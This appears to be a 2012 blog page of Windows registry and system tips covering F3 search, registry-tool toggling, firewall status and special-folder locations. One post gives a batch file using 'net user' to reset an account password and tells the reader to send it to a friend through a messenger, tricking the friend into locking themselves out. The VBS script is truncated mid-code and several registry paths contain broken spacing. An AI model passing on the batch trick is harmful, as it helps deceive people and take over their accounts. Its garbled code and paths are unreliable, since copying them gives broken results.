Sunday, 22 April 2012

Disable a key of F3 Search

Disabling the F3 Search Key
If you want to disable the ability to use the F3 key from either the Windows Explorer or Internet Explorer

Start Regedit
Go to HKEY_CURRENT_USER\Software\Policies\Microsoft\Inte rnet Explorer\Restrictions

Create a Dword value called NoFindFiles
Give it a value of 1

Enable/Disable Registry Editing tools

windows registry
Enable/Disable Registry Editing tools
Copy the following code,paste in any notepad and save as "regtools.vbs" file. Just double click it and you will get yor regedit enabled.(Be careful to copy the code exactly as presented here including everything.

Code goes here.......



'Enable/Disable Registry Editing tools
'© Doug Knox - rev 12/06/99
Option Explicit
'Declare variables
Dim WSHShell, n, MyBox, p, t, mustboot, errnum, vers
Dim enab, disab, jobfunc, itemtype
Set WSHShell = WScript.CreateObject("WScript.Shell")
p = "HKCU\Software\Microsoft\Windows\CurrentVersion\Po licies\System\"
p = p & "DisableRegistryTools"
itemtype = "REG_DWORD"
mustboot = "Log off and back on, or restart your pc to" & vbCR & "effect the changes"
enab = "ENABLED"
disab = "DISABLED"
jobfunc = "Registry Editing Tools are now "
'This section tries to read the registry key value. If not present an
'error is generated. Normal error return should be 0 if value is
'present
t = "Confirmation"
Err.Clear
On Error Resume Next
n = WSHShell.RegRead (p)
On Error Goto 0
errnum = Err.Number
if errnum <> 0 then

Check Personal Firewall Status

windows registry

Check Personal Firewall Status Tip
How can you check the status of the connection and the firewall? Simply open Control Panel from the Start Menu, open Internet and Network Connections, then Network Connections. By default the view is of large icons.

Click the View Menu, and choose "details" in order to reveal several more columns of information about the connections that your computer has. Check the Status column to see if your connection is currently connected, and whether or not it is "firewalled." You can even drag the column headings around (I like to slide the Status column right next to the Name column. You can even remove entire columns by right-clicking the column heading and unchecking it.
now firewall on

Changing password of a remote PC

speed pc


Changing password of a remote PC

Using the below given tips you can change the password of an user account in your friend’s system.


1. Open notepad.


2. Type the following command.


@echo off


net user username password


echo “type message here” pause


3. Save as filename.bat and select type of files as all files otherwise, file didn’t work.


4. Send file to your friend through any messenger.


You have successfully managed to change the Password of an user account.

change the Location Of windows Folders

Changing the Location Of Special Folders



You can modify the registry to change the location of special folders like:
My Documents
Favorites
My Pictures
Personal
Start Regedit
Go to HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\User Shell Folders
Double click on any locations you want to change and alter the path
Logoff or restart for the changes to go into effect

Note: TweakUI from Microsoft will allow you to make these changes from a dialog box as well.